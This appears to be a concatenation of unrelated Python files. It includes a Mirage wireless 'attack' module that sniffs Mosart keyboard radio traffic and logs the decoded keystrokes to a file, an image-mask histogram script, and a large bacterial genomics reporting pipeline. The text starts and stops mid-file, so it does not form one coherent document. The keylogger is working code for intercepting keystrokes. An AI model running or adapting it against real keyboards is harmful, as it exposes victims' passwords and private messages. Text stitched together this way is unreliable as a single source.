])
assert_equal(mask, result)
|
python
|
from mirage.libs import mosart,utils,io
from mirage.libs.common.hid import HIDMapping
from mirage.core import module
class mosart_keylogger(module.WirelessModule):
def init(self):
self.technology = "mosart"
self.type = "attack"
self.description = "Keystrokes logger module for Mosart keyboard"
self.args = {
"INTERFACE":"rfstorm0",
"TARGET":"",
"CHANNEL":"36",
"LOCALE":"fr",
"TIME":"",
"TEXT_FILE":""
}
self.lastKey = None
self.text = ""
def checkSniffingCapabilities(self):
return self.receiver.hasCapabilities("SNIFFING_NORMAL")
def show(self,pkt):
if pkt.state == "pressed":
key = HIDMapping(locale=self.args["LOCALE"].lower()).getKeyFromHIDCode(pkt.hidCode,pkt.modifiers)
if key is not None:
if key != self.lastKey:
io.info(key)
self.text += key if len(key) == 1 else " ["+key+"] "
self.lastKey = key
else:
io.fail("Unknown HID code and modifiers: hidCode = "+str(pkt.hidCode)+" | modifiers = "+str(pkt.modifiers))
elif pkt.state == "released":
self.lastKey = None
def exportTextFile(self):
io.info("Captured keystrokes: "+self.text)
if self.args["TEXT_FILE"] != "":
with open(self.args["TEXT_FILE"],"w") as f:
io.success("Captured keystrokes stored as "+self.args["TEXT_FILE"])
f.write(self.text)
f.close()
def run(self):
self.receiver = self.getReceiver(interface=self.args["INTERFACE"])
self.receiver.enterSnifferMode(utils.addressArg(self.args["TARGET"]))
if self.checkSniffingCapabilities():
self.receiver.onEvent("MosartKeyboardKeystrokePacket",callback=self.show)
self.receiver.setChannel(utils.integerArg(self.args["CHANNEL"]))
try:
time = utils.integerArg(self.args['TIME']) if self.args["TIME"] != "" else None
start = utils.now()
while utils.now() - start <= time if time is not None else True:
utils.wait(seconds=0.5)
except KeyboardInterrupt:
self.exportTextFile()
self.receiver.removeCallbacks()
return self.ok({"TEXT":self.text})
self.exportTextFile()
self.receiver.removeCallbacks()
return self.ok({"TEXT":self.text})
else:
io.fail("Interface provided ("+str(self.args["INTERFACE"])+") is not able to run in sniffing mode.")
return self.nok()
|
python
|
import torch
from PIL import Image
import matplotlib.pyplot as plt
from torchvision import transforms
# Set up the matplotlib figure
f, axes = plt.subplots(1, 2, figsize=(7, 7), sharex=True)
# Generate a random univariate dataset
img_data = Image.open("../data/Test/Snow100K-L/synthetic/beautiful_smile_00003.jpg").convert('RGB')
mask_data = Image.open("../data/Test/Snow100K-L/mask/beautiful_smile_00003.jpg").convert('L')
gt_data = Image.open("../data/Test/Snow100K-L/gt/beautiful_smile_00003.jpg").convert('RGB')
toTensor = transforms.ToTensor()
img_tensor = toTensor(img_data).to(device='cuda:0')
mask_tensor = toTensor(mask_data).to(device='cuda:0')
gt_tensor = toTensor(gt_data).to(device='cuda:0')
img_index = (mask_tensor>0).repeat(3,1,1)
with torch.no_grad():
a_gt = (img_tensor - (1 - mask_tensor) * gt_tensor)/(1e-8 + mask_tensor) * (mask_tensor != 0)
za = img_tensor - (1 - mask_tensor) * gt_tensor
a_gt = a_gt.cpu().numpy().reshape(a_gt.shape[0]*a_gt.shape[1]*a_gt.shape[2])
za = za.cpu().numpy().reshape(za.shape[0]*za.shape[1]*za.shape[2])
num_bins = 30
plt.subplot(1,2,1)
plt.hist(a_gt, bins=num_bins, color="r", log=True)
plt.title('(a)', y=-0.10)
plt.subplot(1,2,2)
plt.hist(za, bins=num_bins, color="b", log=True)
plt.title('(b)', y=-0.10)
plt.tight_layout()
plt.show()
|
python
|
#!/usr/bin/env python3
from olctools.accessoryFunctions.accessoryFunctions import combinetargets, filer, GenObject, MetadataObject, \
make_path, run_subprocess, write_to_logfile
from olctools.accessoryFunctions.metadataprinter import MetadataPrinter
from genemethods.typingclasses.resistance import ResistanceNotes
from genemethods.assemblypipeline.GeneSeekr import GeneSeekr
from genemethods.sipprCommon.objectprep import Objectprep
from genemethods.sipprCommon.sippingmethods import Sippr
from genemethods.genesippr.genesippr import GeneSippr
from genemethods.serosippr.serosippr import SeroSippr
from genemethods.sipprCommon.kma_wrapper import KMA
from genemethods.geneseekr.blast import BLAST
from Bio.Seq import Seq
from Bio import SeqIO
from Bio.SeqRecord import SeqRecord
from glob import glob
import xlsxwriter
import threading
import logging
import pandas
import shutil
import os
import re
__author__ = 'adamkoziol'
class GDCS(object):
def main(self):
"""
Run the necessary methods in the correct order
"""
if not os.path.isfile(self.gdcs_report):
logging.info('Starting {at} analysis pipeline'.format(at=self.analysistype))
# Extract the number of core genes found out of the total number of core genes for that genus.
self.gene_tally()
# Create the reports
self.reporter()
else:
self.report_parse()
def gene_tally(self):
"""
Tally the number of core genes present out of the total number of expected core genes for MLST, rMLST, and
cgMLST analyses
"""
for sample in self.runmetadata.samples:
genes_present = 0
genes_total = 0
# Create the GenObject with the necessary attributes
setattr(sample, self.analysistype, GenObject())
for analysistype in self.analyses:
sample[self.analysistype]['{at}_genes_present'.format(at=analysistype)] = 0
sample[self.analysistype]['{at}_genes_total'.format(at=analysistype)] = 0
try:
# Add the total number of genes in the database of the current analysis type
sample[self.analysistype]['{at}_genes_present'.format(at=analysistype)] \
+= len(sample[analysistype].combined_metadata_results)
sample[self.analysistype]['{at}_genes_total'.format(at=analysistype)] \
+= len(sample[analysistype].combined_metadata_results)
# A gene can be present multiple times in the list of the mismatches to sequence type attribute.
# Only consider each gene once
counted_genes = list()
# Subtract genes that are not present in the strain
for mismatch in sample[analysistype].mismatchestosequencetype:
for gene, allele in mismatch.items():
if gene not in counted_genes:
counted_genes.append(gene)
# If the gene is not present in the strain, and the profile, subtract the gene from
# both the genes present and genes total
if allele == 'NA (N)':
sample[self.analysistype]['{at}_genes_present'.format(at=analysistype)] -= 1
sample[self.analysistype]['{at}_genes_total'.format(at=analysistype)] -= 1
# If the gene is missing in the strain, but present in the profile, only subtract
# the gene from the genes present
elif 'NA (' in allele:
sample[self.analysistype]['{at}_genes_present'.format(at=analysistype)] -= 1
except AttributeError:
pass
# Add the MLST and rMLST genes to the running totals
if analysistype != 'cgmlst':
# Increment the genes present and total variables with the results from the current analysis
genes_present += sample[self.analysistype]['{at}_genes_present'.format(at=analysistype)]
genes_total += sample[self.analysistype]['{at}_genes_total'.format(at=analysistype)]
# Calculate the total core results
sample[self.analysistype].coreresults = '{pres}/{total}'.format(pres=genes_present,
total=genes_total)
def reporter(self):
"""
Create a report of the core genes present / total genes for each strain
"""
data = 'Strain,Genus,TotalCore,MLST_genes,rMLST_genes,cgMLST_genes,\n'
for sample in self.runmetadata.samples:
# Extract the closest reference genus
try:
genus = sample.general.closestrefseqgenus
except AttributeError:
try:
genus = sample.general.referencegenus
except AttributeError:
genus = 'ND'
data += '{sn},{genus},{total},'.format(sn=sample.name,
genus=genus,
total=sample[self.analysistype].coreresults)
for analysis in self.analyses:
data += '{present}/{total},'.format(present=sample[self.analysistype]['{at}_genes_present'
.format(at=analysis)],
total=sample[self.analysistype]['{at}_genes_total'
.format(at=analysis)])
data += '\n'
with open(self.gdcs_report, 'w') as report:
report.write(data)
def report_parse(self):
"""
Parse an existing GDCS report, and extract the results
"""
nesteddictionary = dict()
# Use pandas to read in the CSV file, and convert the pandas data frame to a dictionary (.to_dict())
dictionary = pandas.read_csv(self.gdcs_report).to_dict()
# Iterate through the dictionary - each header from the CSV file
for header in dictionary:
# Sample is the primary key, and value is the value of the cell for that primary key + header combination
for sample, value in dictionary[header].items():
# Update the dictionary with the new data
if sample not in nesteddictionary:
nesteddictionary[sample] = dict()
nesteddictionary[sample].update({header: value})
for sample in self.runmetadata.samples:
# Create the GenObject with the necessary attributes
setattr(sample, self.analysistype, GenObject())
report_strains = list()
for key in nesteddictionary:
strain = nesteddictionary[key]['Strain']
report_strains.append(strain)
for sample in self.runmetadata.samples:
if strain == sample.name:
self.genobject_populate(key=key,
sample=sample,
nesteddictionary=nesteddictionary)
for sample in self.runmetadata.samples:
if sample.name not in report_strains:
self.genobject_populate(key=None,
sample=sample,
nesteddictionary=dict())
def genobject_populate(self, key, sample, nesteddictionary):
try:
# Pull the necessary values from the report
for header, value in nesteddictionary[key].items():
if header == 'TotalCore':
sample[self.analysistype].coreresults = value
elif header == 'MLST_genes':
sample[self.analysistype].mlst_genes_present, sample[self.analysistype].mlst_genes_total \
= value.split('/')
elif header == 'rMLST_genes':
sample[self.analysistype].rmlst_genes_present, \
sample[self.analysistype].rmlst_genes_total \
= value.split('/')
except KeyError:
pass
def __init__(self, inputobject):
self.reports = str()
self.samples = inputobject.runmetadata
self.starttime = inputobject.starttime
self.completemetadata = inputobject.runmetadata
self.path = inputobject.path
self.analysescomplete = True
self.reportpath = inputobject.reportpath
self.runmetadata = inputobject.runmetadata
self.homepath = inputobject.homepath
self.analysistype = 'gdcs'
self.cutoff = 0.9
self.pipeline = True
self.revbait = False
self.sequencepath = inputobject.path
self.targetpath = os.path.join(inputobject.reffilepath, self.analysistype)
self.cpus = inputobject.cpus
self.threads = int(self.cpus / len(self.runmetadata.samples)) \
if self.cpus / len(self.runmetadata.samples) > 1 else 1
self.logfile = inputobject.logfile
self.analyses = ['mlst', 'rmlst', 'cgmlst']
self.gdcs_report = os.path.join(self.reportpath, '{at}.csv'.format(at=self.analysistype))
class Plasmids(GeneSippr):
def runner(self):
"""
Run the necessary methods in the correct order
"""
logging.info('Starting {at} analysis pipeline'.format(at=self.analysistype))
if not self.pipeline:
general = None
for sample in self.runmetadata.samples:
general = getattr(sample, 'general')
if general is None:
# Create the objects to be used in the analyses
objects = Objectprep(self)
objects.objectprep()
self.runmetadata = objects.samples
# Run the analyses
ShortKSippingMethods(self, self.cutoff)
# Create the reports
self.reporter()
# Print the metadata
MetadataPrinter(self)
def reporter(self):
"""
Creates a report of the results
"""
# Create the path in which the reports are stored
make_path(self.reportpath)
data = 'Strain,Gene,PercentIdentity,Length,FoldCoverage\n'
with open(os.path.join(self.reportpath, self.analysistype + '.csv'), 'w') as report:
for sample in self.runmetadata.samples:
data += sample.name + ','
try:
if sample[self.analysistype].results:
multiple = False
for name, identity in sample[self.analysistype].results.items():
if not multiple:
data += '{},{},{},{}\n'.format(name, identity,
len(sample[self.analysistype].sequences[name]),
sample[self.analysistype].avgdepth[name])
else:
data += ',{},{},{},{}\n'.format(name, identity,
len(sample[self.analysistype].sequences[name]),
sample[self.analysistype].avgdepth[name])
multiple = True
else:
data += '\n'
except AttributeError:
data += '\n'
report.write(data)
class PlasmidExtractor(object):
def main(self):
"""
Run the methods in the correct order
"""
self.run_plasmid_extractor()
self.parse_report()
def run_plasmid_extractor(self):
"""
Create and run the plasmid extractor system call
"""
logging.info('Extracting plasmids')
# Define the system call
extract_command = 'PlasmidExtractor.py -i {inf} -o {outf} -p {plasdb} -d {db} -t {cpus} -nc' \
.format(inf=self.path,
outf=self.plasmid_output,
plasdb=os.path.join(self.plasmid_db, 'plasmid_db.fasta'),
db=self.plasmid_db,
cpus=self.cpus)
# Only attempt to extract plasmids if the report doesn't already exist
if not os.path.isfile(self.plasmid_report):
# Run the system calls
out, err = run_subprocess(extract_command)
# Acquire thread lock, and write the logs to file
self.threadlock.acquire()
write_to_logfile(extract_command, extract_command, self.logfile)
write_to_logfile(out, err, self.logfile)
self.threadlock.release()
def parse_report(self):
"""
Parse the plasmid extractor report, and populate metadata objects
"""
logging.info('Parsing Plasmid Extractor outputs')
# A dictionary to store the parsed excel file in a more readable format
nesteddictionary = dict()
# Use pandas to read in the CSV file, and convert the pandas data frame to a dictionary (.to_dict())
dictionary = pandas.read_csv(self.plasmid_report).to_dict()
# Iterate through the dictionary - each header from the CSV file
for header in dictionary:
# Sample is the primary key, and value is the value of the cell for that primary key + header combination
for sample, value in dictionary[header].items():
# Update the dictionary with the new data
try:
nesteddictionary[sample].update({header: value})
# Create the nested dictionary if it hasn't been created yet
except KeyError:
nesteddictionary[sample] = dict()
nesteddictionary[sample].update({header: value})
# Get the results into the metadata object
for sample in self.metadata:
# Initialise the plasmid extractor genobject
setattr(sample, self.analysistype, GenObject())
# Initialise the list of all plasmids
sample[self.analysistype].plasmids = list()
# Iterate through the dictionary of results
for line in nesteddictionary:
# Extract the sample name from the dictionary in a manner consistent with the rest of the COWBAT
# pipeline e.g. 2014-SEQ-0276_S2_L001 becomes 2014-SEQ-0276
sample_name = nesteddictionary[line]['Sample']
# Use the filer method to extract the name
name = list(filer([sample_name]))[0]
# Ensure that the names match
if name == sample.name:
# Append the plasmid name extracted from the dictionary to the list of plasmids
sample[self.analysistype].plasmids.append(nesteddictionary[line]['Plasmid'])
# Copy the report to the folder containing all reports for the pipeline
try:
shutil.copyfile(self.plasmid_report, os.path.join(self.reportpath, 'plasmidReport.csv'))
except IOError:
pass
def __init__(self, inputobject):
self.path = inputobject.path
self.reportpath = inputobject.reportpath
self.reffilepath = inputobject.reffilepath
self.analysistype = 'plasmidextractor'
self.plasmid_output = os.path.join(self.path, self.analysistype)
self.plasmid_db = os.path.join(self.reffilepath, self.analysistype)
self.plasmid_report = os.path.join(self.plasmid_output, 'plasmidReport.csv')
self.start = inputobject.starttime
self.cpus = inputobject.cpus
self.logfile = inputobject.logfile
self.threadlock = threading.Lock()
self.metadata = inputobject.runmetadata.samples
class Serotype(SeroSippr):
def runner(self):
"""
Run the necessary methods in the correct order
"""
sero_report = os.path.join(self.reportpath, 'serosippr.csv')
if os.path.isfile(sero_report):
self.report_parse(sero_report)
else:
logging.info('Starting {} analysis pipeline'.format(self.analysistype))
# Run the analyses
ShortKSippingMethods(self, self.cutoff)
self.serotype_escherichia()
self.serotype_salmonella()
# Create the reports
self.reporter()
# Print the metadata
MetadataPrinter(self)
def report_parse(self, sero_report):
"""
Parse an existing report, and extract the results
:param sero_report: type STR: Name and absolute path of the report
"""
with open(sero_report, 'r') as report:
next(report)
for line in report:
data = line.rstrip().split(',')
for sample in self.runmetadata.samples:
if sample.name in line:
if data[1]:
setattr(sample, self.analysistype, GenObject())
o_results, h_results = data[1].split(':')
sample[self.analysistype].o_set = [o_results.split(' ')[0]]
try:
sample[self.analysistype].best_o_pid = o_results.split(' ')[1].replace('(', '') \
.replace(')', '')
except IndexError:
sample[self.analysistype].best_o_pid = 'ND'
sample[self.analysistype].h_set = [h_results.split(' ')[0]]
try:
sample[self.analysistype].best_h_pid = h_results.split(' ')[1].replace('(', '') \
.replace(')', '')
except IndexError:
sample[self.analysistype].best_h_pid = 'ND'
class ShortKSippingMethods(Sippr):
def main(self):
"""
Run the methods in the correct order for pipelines
"""
# Find the target files
self.targets()
kmer = 15 if self.analysistype == 'GDCS' else 17
# Use bbduk to bait the FASTQ reads matching the target sequences
self.bait(maskmiddle='t', k=kmer)
# If desired, use bbduk to bait the target sequences with the previously baited FASTQ files
if self.revbait:
self.reversebait(maskmiddle='t', k=kmer)
# Run the bowtie2 read mapping module
self.mapping()
# Use samtools to index the sorted bam file
self.indexing()
# Parse the results
# self.parsing()
self.parsebam()
# Filter out any sequences with cigar features such as internal soft-clipping from the results
# self.clipper()
class ResSippr(GeneSippr):
def runner(self):
"""
Run the necessary methods in the correct order
"""
logging.info('Starting {} analysis pipeline'.format(self.analysistype))
if not self.pipeline:
general = None
for sample in self.runmetadata.samples:
general = getattr(sample, 'general')
if general is None:
# Create the objects to be used in the analyses
objects = Objectprep(self)
objects.objectprep()
self.runmetadata = objects.samples
# Run the analyses
ShortKSippingMethods(inputobject=self,
cutoff=self.cutoff,
allow_soft_clips=self.allow_soft_clips)
# noinspection PyMissingConstructor
def __init__(self, args, pipelinecommit, startingtime, scriptpath, analysistype, cutoff, pipeline, revbait,
allow_soft_clips=False):
"""
:param args: command line arguments
:param pipelinecommit: pipeline commit or version
:param startingtime: time the script was started
:param scriptpath: home path of the script
:param analysistype: name of the analysis being performed - allows the program to find databases
:param cutoff: percent identity cutoff for matches
:param pipeline: boolean of whether this script needs to run as part of a particular assembly pipeline
:param allow_soft_clips: Boolean whether the BAM parsing should exclude sequences with internal soft clips
"""
# Initialise variables
# super().__init__(args, pipelinecommit, startingtime, scriptpath, analysistype, cutoff, pipeline, revbait)
self.commit = str(pipelinecommit)
self.starttime = startingtime
self.homepath = scriptpath
# Define variables based on supplied arguments
self.path = os.path.join(args.path)
assert os.path.isdir(self.path), u'Supplied path is not a valid directory {0!r:s}'.format(self.path)
try:
self.sequencepath = os.path.join(args.sequencepath)
except AttributeError:
self.sequencepath = self.path
assert os.path.isdir(self.sequencepath), u'Sequence path is not a valid directory {0!r:s}' \
.format(self.sequencepath)
try:
self.targetpath = os.path.join(args.reffilepath, analysistype)
except AttributeError:
self.targetpath = os.path.join(args.targetpath)
self.reportpath = os.path.join(self.path, 'reports')
assert os.path.isdir(self.targetpath), u'Target path is not a valid directory {0!r:s}' \
.format(self.targetpath)
try:
self.bcltofastq = args.bcltofastq
except AttributeError:
self.bcltofastq = False
try:
self.miseqpath = args.miseqpath
except AttributeError:
self.miseqpath = str()
try:
self.miseqfolder = args.miseqfolder
except AttributeError:
self.miseqfolder = str()
try:
self.fastqdestination = args.fastqdestination
except AttributeError:
self.fastqdestination = str()
try:
self.forwardlength = args.forwardlength
except AttributeError:
self.forwardlength = 'full'
try:
self.reverselength = args.reverselength
except AttributeError:
self.reverselength = 'full'
self.numreads = 2 if self.reverselength != 0 else 1
try:
self.customsamplesheet = args.customsamplesheet
except AttributeError:
self.customsamplesheet = False
self.logfile = args.logfile
# Set the custom cutoff value
self.cutoff = float(cutoff)
try:
self.averagedepth = int(args.averagedepth)
except AttributeError:
self.averagedepth = 10
try:
self.copy = args.copy
except AttributeError:
self.copy = False
self.runmetadata = args.runmetadata
# Use the argument for the number of threads to use, or default to the number of cpus in the system
self.cpus = int(args.cpus)
try:
self.threads = int(self.cpus / len(self.runmetadata.samples)) if self.cpus / len(self.runmetadata.samples) \
> 1 else 1
except TypeError:
self.threads = self.cpus
self.taxonomy = {'Escherichia': 'coli', 'Listeria': 'monocytogenes', 'Salmonella': 'enterica'}
self.analysistype = analysistype
self.pipeline = pipeline
self.revbait = revbait
self.allow_soft_clips = allow_soft_clips
class Resistance(ResSippr):
def main(self):
res_report = os.path.join(self.reportpath, 'resfinder.csv')
if os.path.isfile(res_report):
self.parse_report(res_report=res_report)
else:
self.runner()
# Create the reports
self.reporter()
def parse_report(self, res_report):
"""
Parse an existing report, and extract the results
:param res_report: type STR: name and absolute path of the report
"""
for sample in self.runmetadata.samples:
setattr(sample, self.analysistype, GenObject())
sample[self.analysistype].results = dict()
sample[self.analysistype].pipelineresults = list()
sample[self.analysistype].avgdepth = dict()
with open(res_report, 'r') as report:
next(report)
for line in report:
try:
strain, res, gene, allele, accession, perc_ident, length, fold_cov = line.rstrip().split(',')
if sample.name in line:
if strain:
name = '{gene}_{accession}_{allele}'.format(gene=gene,
accession=accession,
allele=allele)
sample[self.analysistype].results[name] = perc_ident
sample[self.analysistype].pipelineresults.append(
'{rgene} ({pid}%) {rclass}'.format(rgene=gene,
pid=perc_ident,
rclass=res))
sample[self.analysistype].avgdepth[name] = fold_cov
except ValueError:
pass
def reporter(self):
"""
Creates a report of the results
"""
logging.info('Creating {at} report'.format(at=self.analysistype))
resistance_classes = ResistanceNotes.classes(self.targetpath)
# Find unique gene names with the highest percent identity
for sample in self.runmetadata.samples:
try:
if sample[self.analysistype].results:
# Initialise a dictionary to store the unique genes, and their percent identities
sample[self.analysistype].uniquegenes = dict()
for name, identity in sample[self.analysistype].results.items():
# Split the name of the gene from the string e.g. ARR-2_1_HQ141279 yields ARR-2
genename = name.split('_')[0]
# Set the best observed percent identity for each unique gene
try:
# Pull the previous best identity from the dictionary
bestidentity = sample[self.analysistype].uniquegenes[genename]
# If the current identity is better than the old identity, save it
if float(identity) > float(bestidentity):
sample[self.analysistype].uniquegenes[genename] = float(identity)
# Initialise the dictionary if necessary
except KeyError:
sample[self.analysistype].uniquegenes[genename] = float(identity)
except AttributeError:
pass
# Create the path in which the reports are stored
make_path(self.reportpath)
# Initialise strings to store the results
data = 'Strain,Resistance,Gene,Allele,Accession,PercentIdentity,Length,FoldCoverage\n'
with open(os.path.join(self.reportpath, self.analysistype + '.csv'), 'w') as report:
for sample in self.runmetadata.samples:
# Create an attribute to store the string for the eventual pipeline report
sample[self.analysistype].pipelineresults = list()
if sample[self.analysistype].results:
results = False
for name, identity in sorted(sample[self.analysistype].results.items()):
# Extract the necessary variables from the gene name string
gname, genename, accession, allele = ResistanceNotes.gene_name(name)
# Retrieve the best identity for each gene
try:
percentid = sample[self.analysistype].uniquegenes[gname]
# Beta-lactamases will not have the allele and version from the gene name defined above
except KeyError:
percentid = sample[self.analysistype].uniquegenes[gname.split('-')[0]]
# If the percent identity of the current gene matches the best percent identity, add it to
# the report - there can be multiple occurrences of genes e.g.
# sul1,1,AY224185,100.00,840 and sul1,2,CP002151,100.00,927 are both included because they
# have the same 100% percent identity
if float(identity) == percentid:
try:
# Determine resistance phenotype of the gene
res = ResistanceNotes.resistance(name, resistance_classes)
# Populate the results
data += '{sn},{res},{gene},{allele},{accession},{identity},{length},{depth}\n'.format(
sn=sample.name,
res=res,
gene=genename,
allele=allele,
accession=accession,
identity=identity,
length=len(sample[self.analysistype].sequences[name]),
depth=sample[self.analysistype].avgdepth[name])
sample[self.analysistype].pipelineresults.append(
'{rgene} ({pid}%) {rclass}'.format(rgene=genename,
pid=identity,
rclass=res)
)
results = True
except KeyError:
pass
if not results:
data += '{sn}\n'.format(sn=sample.name)
else:
data += '{sn}\n'.format(sn=sample.name)
# Write the string to the file
report.write(data)
class ResFinder(GeneSeekr):
@staticmethod
def sequencenames(contigsfile):
"""
Takes a multifasta file and returns a list of sequence names
:param contigsfile: multifasta of all sequences
:return: list of all sequence names
"""
sequences = list()
for record in SeqIO.parse(open(contigsfile, "rU", encoding="iso-8859-15"), "fasta"):
sequences.append(record.id)
return sequences
def strainer(self):
for sample in self.metadata:
if sample.general.bestassemblyfile != 'NA':
setattr(sample, self.analysistype, GenObject())
targets = glob(os.path.join(self.targetpath, '*.tfa'))
targetcheck = glob(os.path.join(self.targetpath, '*.tfa'))
if targetcheck:
try:
combinedtargets = glob(os.path.join(self.targetpath, '*.fasta'))[0]
except IndexError:
combinetargets(targets, self.targetpath)
combinedtargets = glob(os.path.join(self.targetpath, '*.fasta'))[0]
sample[self.analysistype].targets = targets
sample[self.analysistype].combinedtargets = combinedtargets
sample[self.analysistype].targetpath = self.targetpath
sample[self.analysistype].targetnames = self.sequencenames(combinedtargets)
sample[self.analysistype].reportdir = os.path.join(sample.general.outputdirectory,
self.analysistype)
make_path(sample[self.analysistype].reportdir)
else:
# Set the metadata file appropriately
sample[self.analysistype].targets = 'NA'
sample[self.analysistype].combinedtargets = 'NA'
sample[self.analysistype].targetpath = 'NA'
sample[self.analysistype].targetnames = 'NA'
sample[self.analysistype].reportdir = 'NA'
sample[self.analysistype].blastresults = 'NA'
else:
# Set the metadata file appropriately
setattr(sample, self.analysistype, GenObject())
sample[self.analysistype].targets = 'NA'
sample[self.analysistype].combinedtargets = 'NA'
sample[self.analysistype].targetpath = 'NA'
sample[self.analysistype].targetnames = 'NA'
sample[self.analysistype].reportdir = 'NA'
sample[self.analysistype].blastresults = 'NA'
def resfinderreporter(self):
"""
Custom reports for ResFinder analyses. These reports link the gene(s) found to their resistance phenotypes
"""
# Initialise resistance dictionaries from the notes.txt file
resistance_classes = ResistanceNotes.classes(self.targetpath)
# Create a workbook to store the report. Using xlsxwriter rather than a simple csv format, as I want to be
# able to have appropriately sized, multi-line cells
workbook = xlsxwriter.Workbook(os.path.join(self.reportpath, '{}.xlsx'.format(self.analysistype)))
# New worksheet to store the data
worksheet = workbook.add_worksheet()
# Add a bold format for header cells. Using a monotype font size 10
bold = workbook.add_format({'bold': True, 'font_name': 'Courier New', 'font_size': 8})
# Format for data cells. Monotype, size 10, top vertically justified
courier = workbook.add_format({'font_name': 'Courier New', 'font_size': 8})
courier.set_align('top')
# Initialise the position within the worksheet to be (0,0)
row = 0
col = 0
# A dictionary to store the column widths for every header
columnwidth = dict()
extended = False
headers = ['Strain', 'Gene', 'Allele', 'Resistance', 'PercentIdentity', 'PercentCovered', 'Contig', 'Location',
'nt_sequence']
for sample in self.metadata:
# Create an attribute to store the string for the eventual pipeline report
sample[self.analysistype].pipelineresults = list()
sample[self.analysistype].sampledata = list()
try:
blastresults = sample[self.analysistype].blastresults
except AttributeError:
blastresults = 'NA'
# Process the sample only if the script could find targets
if blastresults != 'NA':
for result in sample[self.analysistype].blastresults:
# Set the name to avoid writing out the dictionary[key] multiple times
name = result['subject_id']
# Use the ResistanceNotes gene name extraction method to get the necessary variables
gname, genename, accession, allele = ResistanceNotes.gene_name(name)
# Initialise a list to store all the data for each strain
data = list()
# Determine resistance phenotype of the gene
resistance = ResistanceNotes.resistance(name, resistance_classes)
# Append the necessary values to the data list
data.append(genename)
data.append(allele)
data.append(resistance)
percentid = result['percentidentity']
data.append(percentid)
data.append(result['alignment_fraction'])
data.append(result['query_id'])
data.append('...'.join([str(result['low']), str(result['high'])]))
try:
# Populate the attribute storing the resfinder results
sample[self.analysistype].pipelineresults.append(
'{rgene} ({pid}%) {rclass}'.format(rgene=genename,
pid=percentid,
rclass=resistance))
# Only if the alignment option is selected, for inexact results, add alignments
if self.align and percentid != 100.00:
# Align the protein (and nucleotide) sequences to the reference
self.alignprotein(sample, name)
if not extended:
# Add the appropriate headers
headers.extend(['aa_Identity',
'aa_Alignment',
'aa_SNP_location',
'nt_Alignment',
'nt_SNP_location'
])
extended = True
# Create a FASTA-formatted sequence output of the query sequence
record = SeqRecord(sample[self.analysistype].dnaseq[name],
id='{}_{}'.format(sample.name, name),
description='')
# Add the alignment, and the location of mismatches for both nucleotide and amino
# acid sequences
data.extend([record.format('fasta'),
sample[self.analysistype].aaidentity[name],
sample[self.analysistype].aaalign[name],
sample[self.analysistype].aaindex[name],
sample[self.analysistype].ntalign[name],
sample[self.analysistype].ntindex[name]
])
else:
record = SeqRecord(Seq(result['subject_sequence']),
id='{}_{}'.format(sample.name, name),
description='')
data.append(record.format('fasta'))
if self.align:
# Add '-'s for the empty results, as there are no alignments for exact matches
data.extend(['100', '-', '-', '-', '-'])
# If there are no blast results for the target, add a '-'
except (KeyError, TypeError):
data.append('-')
sample[self.analysistype].sampledata.append(data)
if 'nt_sequence' not in headers:
headers.append('nt_sequence')
# Write the header to the spreadsheet
for header in headers:
worksheet.write(row, col, header, bold)
# Set the column width based on the longest header
try:
columnwidth[col] = len(header) if len(header) > columnwidth[col] else columnwidth[
col]
except KeyError:
columnwidth[col] = len(header)
worksheet.set_column(col, col, columnwidth[col])
col += 1
# Increment the row and reset the column to zero in preparation of writing results
row += 1
col = 0
# Write out the data to the spreadsheet
for sample in self.metadata:
if not sample[self.analysistype].sampledata:
# Increment the row and reset the column to zero in preparation of writing results
row += 1
col = 0
# Set the width of the row to be the number of lines (number of newline characters) * 12
worksheet.set_row(row)
worksheet.set_column(col, col, columnwidth[col])
for data in sample[self.analysistype].sampledata:
columnwidth[col] = len(sample.name) + 2
worksheet.set_column(col, col, columnwidth[col])
worksheet.write(row, col, sample.name, courier)
col += 1
# List of the number of lines for each result
totallines = list()
for results in data:
#
worksheet.write(row, col, results, courier)
try:
# Counting the length of multi-line strings yields columns that are far too wide, only count
# the length of the string up to the first line break
alignmentcorrect = len(str(results).split('\n')[1])
# Count the number of lines for the data
lines = results.count('\n') if results.count('\n') >= 1 else 1
# Add the number of lines to the list
totallines.append(lines)
except IndexError:
try:
# Counting the length of multi-line strings yields columns that are far too wide, only count
# the length of the string up to the first line break
alignmentcorrect = len(str(results).split('\n')[0])
# Count the number of lines for the data
lines = results.count('\n') if results.count('\n') >= 1 else 1
# Add the number of lines to the list
totallines.append(lines)
# If there are no newline characters, set the width to the length of the string
except AttributeError:
alignmentcorrect = len(str(results))
lines = 1
# Add the number of lines to the list
totallines.append(lines)
# Increase the width of the current column, if necessary
try:
columnwidth[col] = alignmentcorrect if alignmentcorrect > columnwidth[col] else \
columnwidth[col]
except KeyError:
columnwidth[col] = alignmentcorrect
worksheet.set_column(col, col, columnwidth[col])
col += 1
# Set the width of the row to be the number of lines (number of newline characters) * 12
worksheet.set_row(row, max(totallines) * 11)
# Increase the row counter for the next strain's data
row += 1
col = 0
# Close the workbook
workbook.close()
def object_clean(self):
"""
Remove large attributes from the metadata objects
"""
for sample in self.metadata:
try:
delattr(sample[self.analysistype], 'aaidentity')
delattr(sample[self.analysistype], 'aaalign')
delattr(sample[self.analysistype], 'aaindex')
delattr(sample[self.analysistype], 'ntalign')
delattr(sample[self.analysistype], 'ntindex')
delattr(sample[self.analysistype], 'dnaseq')
delattr(sample[self.analysistype], 'blastresults')
except AttributeError:
pass
def __init__(self, inputobject):
self.resfinderfields = ['query_id', 'subject_id', 'positives', 'mismatches', 'gaps', 'evalue', 'bit_score',
'subject_length', 'alignment_length', 'query_start', 'query_end']
self.analysistype = 'resfinder_assembled'
self.metadata = inputobject.runmetadata.samples
self.cutoff = 70
self.start = inputobject.starttime
self.reportdir = inputobject.reportpath
self.pipeline = True
self.referencefilepath = inputobject.reffilepath
self.targetpath = os.path.join(self.referencefilepath, 'resfinder')
self.threads = inputobject.cpus
self.align = True
self.logfile = inputobject.logfile
self.unique = True
self.strainer()
self.runmetadata = MetadataObject()
self.runmetadata.samples = self.metadata
GeneSeekr.__init__(self, self)
self.resfinderreporter()
self.object_clean()
class Prophages(BLAST):
def create_reports(self):
with open(os.path.join(self.reportpath, 'prophages.csv'), 'w') as report:
data = 'Strain,Gene,Host,PercentIdentity,PercentCovered,Contig,Location\n'
# Set the required variables to load prophage data from a summary file
overview = glob(os.path.join(self.targetpath, '*.txt'))[0]
# A dictionary to store the parsed excel file in a more readable format
prophagedata = dict()
# Use pandas to read in the excel file, and subsequently convert the pandas data frame to a dictionary
# (.to_dict()). Only read the first fourteen columns (parse_cols=range(14)), as later columns are not
